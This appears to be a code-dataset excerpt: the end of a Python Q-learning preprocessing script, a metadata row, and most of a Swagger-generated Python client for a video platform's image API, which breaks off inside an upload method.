          default=[100, 100, 50, 0], nargs='+', type=float)
@argh.arg('--save', default=None, help='Save configuration and results in directory')
def save_processed_data(points_file, path_pat, data_ids, config_dir, **extra):
    "Preprocess data and save the voxel grid and SARSA lists"
    # NOTE: docstring previously said "Run basic q-learning algorithm"
    # (copy-pasted); it is the argh command help text.
    num_iter = extra['iter']
    memory_size = extra['memory_size']
    batch_size = extra['batch_size']
    episode_length = extra['elength']

    rl_config = RL_Config()
    rl_config.set_parameters(
        alpha=extra['alpha'],
        gamma=extra['gamma'],
        epsilon=extra['epsilon'],
        blocksize=extra['blocksize'],
        rewards=extra['rewards'])
    rl_config.paths_to_SARSA = getattr(sarsa_util, extra['state_functions'][0])
    rl_config.make_path_NN = getattr(sarsa_util, extra['state_functions'][1])
    rl_config.reward_function = getattr(sarsa_util, extra['state_functions'][2])
    rl_config.transition_function = getattr(sarsa_util, extra['state_functions'][3])
    rl_config.get_random_state = getattr(sarsa_util, extra['explore_functions'][0])
    rl_config.explore_step = getattr(sarsa_util, extra['explore_functions'][1])
    rl_config.set_loadfiles(
        fn_points=points_file,
        fn_config=config_dir,
        fnp_path=path_pat,
        data_ids=data_ids)

    savefolder = extra['save']
    if savefolder is not None:
        # exist_ok avoids the exists()/makedirs() race of the original code.
        os.makedirs(savefolder, exist_ok=True)
        rl_config.save(savefolder)
        summpath = os.path.join(savefolder, 'summary.txt')
        # The iteration parameters are only recorded in the summary here;
        # this command does no training itself.
        summ = rl_config.get_summary()
        summ += "config_dir = {0}\t\t\t//directory storing data config files\n".format(config_dir)
        summ += "num_iter = {0}\t\t\t// number of training iterations\n".format(num_iter)
        summ += "batch_size = {0}\t\t\t//batch train size\n".format(batch_size)
        summ += "memory_size = {0}\t\t\t//total memory size\n".format(memory_size)
        summ += "episode_length = {0}\t\t\t//length of an episode\n".format(episode_length)
        # 'with' guarantees the handle is closed even if the write raises;
        # the original leaked the handle on error.
        with open(summpath, 'wb') as f:
            f.write(bytes(summ, 'UTF-8'))

    rl_config.load_data()
    rl_config.format_grid_and_paths()
    rl_config.paths_to_SARSA(rl_config)

    if savefolder is not None:
        os.makedirs(savefolder, exist_ok=True)
        matpath = os.path.join(savefolder, 'processed_data.mat')
        scipy.io.savemat(matpath, {
            'voxel_grid': rl_config.voxel_grid,
            'SARSA_list': rl_config.total_SARSA_list,
            'person_vector': rl_config.person_vector,
            'config_dir': config_dir})
        print('Saved in :' + savefolder)

    print(rl_config.person_column)
@argh.arg('model', help='Folder containing the model files to load')
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Iteration sample size', default=200)
@argh.arg('-l', '--elength', help='Episode length ', default=500)
def load_qlearn(model, **extra):
    "Load a saved configuration and its Q-learning results"
    # Removed unused locals (num_iter/memory_size/episode_length were
    # extracted from `extra` but never read -- all display code is disabled).
    rl_config = RL_Config.load(model)
    rl_config.load_data()
    rl_config.format_grid_and_paths()
    rl_config.paths_to_SARSA(rl_config)

    Qdict = scipy.io.loadmat(os.path.join(model, 'Q-results.mat'))
    Q = Qdict['Q']
    vals = Qdict['vals']
    umap = Qdict['umap']
    # Mark states never visited during exploration with a sentinel value.
    Q[umap == 0] = -5

    #display.show_value(Q, 1)
    #display.plot_1D(vals.transpose())
    #display.show_action_value(Q, 5, [0])
    #display.show_action_value(Q, 6, [1])
    #display.show_action_value(Q, 7, [2])
    #display.show_value(umap, 22)
    #plt.show()
if __name__ == "__main__":
    # np.nan is rejected as a threshold by NumPy >= 1.14 ("threshold must be
    # non-NAN"); sys.maxsize is the documented way to disable summarization.
    np.set_printoptions(threshold=sys.maxsize, linewidth=120)
    argh.dispatch_commands([show_points_and_path, basic_qlearn, show_denseplot,
                            explore_qlearn, load_qlearn, plot_path_rewards,
                            save_processed_data])
| 43.530675 | 117 | 0.677331 | 2,057 | 14,191 | 4.449684 | 0.114244 | 0.074293 | 0.027969 | 0.036709 | 0.840271 | 0.812411 | 0.80673 | 0.800393 | 0.800393 | 0.791435 | 0 | 0.013711 | 0.162286 | 14,191 | 325 | 118 | 43.664615 | 0.756225 | 0.053696 | 0 | 0.799242 | 0 | 0.022727 | 0.301526 | 0.015043 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026515 | false | 0 | 0.049242 | 0 | 0.075758 | 0.026515 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4768978a8c05403748888093d5a31a45ab2aa0d | 92,671 | py | Python | kinow_client/apis/images_api.py | kinow-io/kinow-python-sdk | 4c1699a3c78048b84287bd049a669651a5b4e2d5 | [
"Apache-2.0"
] | 1 | 2019-06-26T14:24:54.000Z | 2019-06-26T14:24:54.000Z | kinow_client/apis/images_api.py | kinow-io/kinow-python-sdk | 4c1699a3c78048b84287bd049a669651a5b4e2d5 | [
"Apache-2.0"
] | null | null | null | kinow_client/apis/images_api.py | kinow-io/kinow-python-sdk | 4c1699a3c78048b84287bd049a669651a5b4e2d5 | [
"Apache-2.0"
] | 1 | 2018-02-01T10:08:40.000Z | 2018-02-01T10:08:40.000Z | # coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 1.4.58
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ImagesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Store the transport client, lazily creating the shared default one."""
    config = Configuration()
    if not api_client:
        # Fall back to the globally shared client, creating it on first use.
        if not config.api_client:
            config.api_client = ApiClient()
        api_client = config.api_client
    self.api_client = api_client
def get_actor_cover_image(self, actor_id, **kwargs):
    """
    Get cover image of an actor
    Synchronous by default; pass a `callback` kwarg to make the request
    asynchronous, in which case the request thread is returned instead.
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int actor_id: Actor ID to fetch (required)
    :return: Image
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized payload is wanted (not status/headers); both the
    # sync and async paths return the *_with_http_info result unchanged.
    kwargs['_return_http_data_only'] = True
    return self.get_actor_cover_image_with_http_info(actor_id, **kwargs)
def get_actor_cover_image_with_http_info(self, actor_id, **kwargs):
    """
    Get cover image of an actor
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_actor_cover_image_with_http_info(actor_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int actor_id: Actor ID to fetch (required)
    :return: Image
        If the method is called asynchronously,
        returns the request thread.
    """
    # Accepted kwargs: the endpoint parameter plus generic transport options.
    all_params = ['actor_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_actor_cover_image" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'actor_id' is set
    if ('actor_id' not in params) or (params['actor_id'] is None):
        raise ValueError("Missing the required parameter `actor_id` when calling `get_actor_cover_image`")

    collection_formats = {}

    # '{format}' placeholder comes from the swagger template; always JSON here.
    resource_path = '/actors/{actor_id}/cover'.replace('{format}', 'json')
    path_params = {}
    if 'actor_id' in params:
        path_params['actor_id'] = params['actor_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # Authentication setting
    auth_settings = ['ApiClientId', 'ApiClientSecret']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Image',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_category_banner(self, category_id, **kwargs):
    """
    Get Category cover
    Synchronous by default; pass a `callback` kwarg to make the request
    asynchronous, in which case the request thread is returned instead.
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int category_id: Category ID to fetch (required)
    :return: Image
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized payload is wanted (not status/headers); both the
    # sync and async paths return the *_with_http_info result unchanged.
    kwargs['_return_http_data_only'] = True
    return self.get_category_banner_with_http_info(category_id, **kwargs)
def get_category_banner_with_http_info(self, category_id, **kwargs):
    """
    Get Category cover
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_category_banner_with_http_info(category_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int category_id: Category ID to fetch (required)
    :return: Image
        If the method is called asynchronously,
        returns the request thread.
    """
    # Accepted kwargs: the endpoint parameter plus generic transport options.
    all_params = ['category_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_category_banner" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'category_id' is set
    if ('category_id' not in params) or (params['category_id'] is None):
        raise ValueError("Missing the required parameter `category_id` when calling `get_category_banner`")

    collection_formats = {}

    # '{format}' placeholder comes from the swagger template; always JSON here.
    resource_path = '/categories/{category_id}/banner'.replace('{format}', 'json')
    path_params = {}
    if 'category_id' in params:
        path_params['category_id'] = params['category_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # Authentication setting
    auth_settings = ['ApiClientId', 'ApiClientSecret']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Image',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_category_image_types(self, **kwargs):
    """
    Get image types for categories
    Synchronous by default; pass a `callback` kwarg to make the request
    asynchronous, in which case the request thread is returned instead.
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: list[ImageType]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Only the deserialized payload is wanted (not status/headers); both the
    # sync and async paths return the *_with_http_info result unchanged.
    kwargs['_return_http_data_only'] = True
    return self.get_category_image_types_with_http_info(**kwargs)
def get_category_image_types_with_http_info(self, **kwargs):
    """
    Get image types for categories
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_category_image_types_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: list[ImageType]
        If the method is called asynchronously,
        returns the request thread.
    """
    # No endpoint-specific parameters; only generic transport options allowed.
    all_params = []
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_category_image_types" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # '{format}' placeholder comes from the swagger template; always JSON here.
    resource_path = '/categories/image-types'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # Authentication setting
    auth_settings = ['ApiClientId', 'ApiClientSecret']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[ImageType]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_category_images(self, category_id, **kwargs):
    """
    Get images attached to Category

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int category_id: Category ID to fetch (required)
    :param str type: Filter on specific Image type
    :param int page:
    :param int per_page:
    :param callback function: callable invoked with the response (optional)
    :return: CategoryImagesResponse
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_category_images_with_http_info(category_id, **kwargs)
def get_category_images_with_http_info(self, category_id, **kwargs):
    """
    Get images attached to Category

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int category_id: Category ID to fetch (required)
    :param str type: Filter on specific Image type
    :param int page:
    :param int per_page:
    :param callback function: callable invoked with the response (optional)
    :return: CategoryImagesResponse
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `category_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['category_id', 'type', 'page', 'per_page', 'callback',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']
    params = {'category_id': category_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_category_images" % name
            )
        params[name] = value
    if params.get('category_id') is None:
        raise ValueError("Missing the required parameter `category_id` when calling `get_category_images`")
    # Optional filters are forwarded on the query string.
    query_params = {q: params[q]
                    for q in ('type', 'page', 'per_page') if q in params}
    return self.api_client.call_api(
        '/categories/{category_id}/images'.replace('{format}', 'json'), 'GET',
        {'category_id': params['category_id']},
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='CategoryImagesResponse',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_director_cover_image(self, director_id, **kwargs):
    """
    Get cover image of a director

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int director_id: Director ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_director_cover_image_with_http_info(director_id, **kwargs)
def get_director_cover_image_with_http_info(self, director_id, **kwargs):
    """
    Get cover image of a director

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int director_id: Director ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `director_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['director_id', 'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {'director_id': director_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_director_cover_image" % name
            )
        params[name] = value
    if params.get('director_id') is None:
        raise ValueError("Missing the required parameter `director_id` when calling `get_director_cover_image`")
    # No query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/directors/{director_id}/cover'.replace('{format}', 'json'), 'GET',
        {'director_id': params['director_id']},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_product_cover_image(self, product_id, **kwargs):
    """
    Get cover image of a product

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int product_id: Product ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_product_cover_image_with_http_info(product_id, **kwargs)
def get_product_cover_image_with_http_info(self, product_id, **kwargs):
    """
    Get cover image of a product

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int product_id: Product ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `product_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['product_id', 'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {'product_id': product_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_product_cover_image" % name
            )
        params[name] = value
    if params.get('product_id') is None:
        raise ValueError("Missing the required parameter `product_id` when calling `get_product_cover_image`")
    # No query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/products/{product_id}/cover'.replace('{format}', 'json'), 'GET',
        {'product_id': params['product_id']},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_product_image_types(self, **kwargs):
    """
    Get image types for products

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param callback function: callable invoked with the response (optional)
    :return: list[ImageType]
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_product_image_types_with_http_info(**kwargs)
def get_product_image_types_with_http_info(self, **kwargs):
    """
    Get image types for products

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param callback function: callable invoked with the response (optional)
    :return: list[ImageType]
    :raises TypeError: on an unrecognized keyword argument
    """
    # Keyword arguments this endpoint understands.
    recognized = ['callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_product_image_types" % name
            )
        params[name] = value
    # No path/query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/products/image-types'.replace('{format}', 'json'), 'GET',
        {},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='list[ImageType]',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_product_images(self, product_id, **kwargs):
    """
    Get images attached to product

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int product_id: Product ID to fetch (required)
    :param str type: Filter on specific Image type
    :param int page:
    :param int per_page:
    :param callback function: callable invoked with the response (optional)
    :return: CategoryImagesResponse
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_product_images_with_http_info(product_id, **kwargs)
def get_product_images_with_http_info(self, product_id, **kwargs):
    """
    Get images attached to product

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int product_id: Product ID to fetch (required)
    :param str type: Filter on specific Image type
    :param int page:
    :param int per_page:
    :param callback function: callable invoked with the response (optional)
    :return: CategoryImagesResponse
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `product_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['product_id', 'type', 'page', 'per_page', 'callback',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']
    params = {'product_id': product_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_product_images" % name
            )
        params[name] = value
    if params.get('product_id') is None:
        raise ValueError("Missing the required parameter `product_id` when calling `get_product_images`")
    # Optional filters are forwarded on the query string.
    query_params = {q: params[q]
                    for q in ('type', 'page', 'per_page') if q in params}
    return self.api_client.call_api(
        '/products/{product_id}/images'.replace('{format}', 'json'), 'GET',
        {'product_id': params['product_id']},
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='CategoryImagesResponse',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_product_screenshots(self, product_id, **kwargs):
    """
    Get product screenshots

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int product_id: Product ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: list[Image]
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_product_screenshots_with_http_info(product_id, **kwargs)
def get_product_screenshots_with_http_info(self, product_id, **kwargs):
    """
    Get product screenshots

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int product_id: Product ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: list[Image]
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `product_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['product_id', 'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {'product_id': product_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_product_screenshots" % name
            )
        params[name] = value
    if params.get('product_id') is None:
        raise ValueError("Missing the required parameter `product_id` when calling `get_product_screenshots`")
    # No query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/products/{product_id}/screenshots'.replace('{format}', 'json'), 'GET',
        {'product_id': params['product_id']},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='list[Image]',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_slider_image(self, **kwargs):
    """
    Get slider images

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param callback function: callable invoked with the response (optional)
    :return: list[Image]
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_slider_image_with_http_info(**kwargs)
def get_slider_image_with_http_info(self, **kwargs):
    """
    Get slider images

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param callback function: callable invoked with the response (optional)
    :return: list[Image]
    :raises TypeError: on an unrecognized keyword argument
    """
    # Keyword arguments this endpoint understands.
    recognized = ['callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_slider_image" % name
            )
        params[name] = value
    # No path/query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/widgets/slider/images'.replace('{format}', 'json'), 'GET',
        {},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='list[Image]',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_subscription_cover_image(self, subscription_id, **kwargs):
    """
    Get cover image of a subscription

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int subscription_id: Subscription ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_subscription_cover_image_with_http_info(subscription_id, **kwargs)
def get_subscription_cover_image_with_http_info(self, subscription_id, **kwargs):
    """
    Get cover image of a subscription

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int subscription_id: Subscription ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `subscription_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['subscription_id', 'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {'subscription_id': subscription_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_subscription_cover_image" % name
            )
        params[name] = value
    if params.get('subscription_id') is None:
        raise ValueError("Missing the required parameter `subscription_id` when calling `get_subscription_cover_image`")
    # No query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/subscriptions/{subscription_id}/cover'.replace('{format}', 'json'), 'GET',
        {'subscription_id': params['subscription_id']},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_video_cover(self, video_id, **kwargs):
    """
    Get video cover

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param int video_id: Video ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.get_video_cover_with_http_info(video_id, **kwargs)
def get_video_cover_with_http_info(self, video_id, **kwargs):
    """
    Get video cover

    Performs the HTTP request and returns the full response information.
    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously (the request thread is then returned).

    :param int video_id: Video ID to fetch (required)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when `video_id` is missing or None
    """
    # Keyword arguments this endpoint understands.
    recognized = ['video_id', 'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    params = {'video_id': video_id}
    for name, value in iteritems(kwargs):
        if name not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_video_cover" % name
            )
        params[name] = value
    if params.get('video_id') is None:
        raise ValueError("Missing the required parameter `video_id` when calling `get_video_cover`")
    # No query/header/form/body payload for this endpoint.
    return self.api_client.call_api(
        '/videos/{video_id}/cover'.replace('{format}', 'json'), 'GET',
        {'video_id': params['video_id']},
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def upload_actor_cover(self, actor_id, file, hash, **kwargs):
    """
    Upload actor cover

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param float actor_id: Actor ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.upload_actor_cover_with_http_info(actor_id, file, hash, **kwargs)
def upload_actor_cover_with_http_info(self, actor_id, file, hash, **kwargs):
    """
    Upload actor cover

    Sends the image as a multipart/form-data POST along with its checksum so
    the server can verify the upload. Synchronous by default; pass a
    `callback` callable in kwargs to run the request asynchronously (the
    request thread is then returned).

    :param float actor_id: Actor ID to fetch (required)
    :param file file: image file to upload (required)
    :param str hash: checksum of the uploaded file (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when a required parameter is missing or None
    """
    all_params = ['actor_id', 'file', 'hash', 'hash_algorithm']
    all_params.append('callback')
